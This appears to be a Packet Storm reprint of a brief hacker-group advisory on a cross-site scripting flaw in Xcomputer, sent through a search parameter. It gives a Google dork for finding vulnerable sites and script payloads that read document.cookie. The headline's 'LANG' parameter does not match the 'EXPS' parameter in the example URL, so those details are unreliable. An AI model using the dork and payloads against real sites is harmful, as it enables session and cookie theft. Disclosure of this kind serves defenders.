Xcomputer is susceptible to cross site scripting attacks via the LANG parameter.
0497f12ca01d16c2d272433074872cd34afb9afd6a29b92681e6fb902e23bf57# Xcomputer - Lang Parameter Cross-Site Scripting Vulnerability
# Download:
# http://www.xcomputer.cz/
# Bug found by JosS / Jose Luis Góngora Fernández
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "power by xcomputer.cz"
# Stop lammer
# Exploit In (XSS):
http://www.example.com/Search.asp?EXPS=[XSS]
....
# Cross Siting Scripting (Code):
"><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
//---------------------------------------\\
Greetz To: All Hackers
JosS! / Jose Luis Góngora Fernández
_________________________________________________________________
Descubre la descarga digital con MSN Music. Más de un millón de canciones.
http://music.msn.es/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed